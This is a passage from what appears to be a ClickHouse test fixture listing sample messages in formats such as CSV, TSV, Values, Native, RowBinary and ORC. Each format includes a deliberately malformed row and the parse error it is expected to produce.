'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Type of \'blockNo\' must be UInt16, not String"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\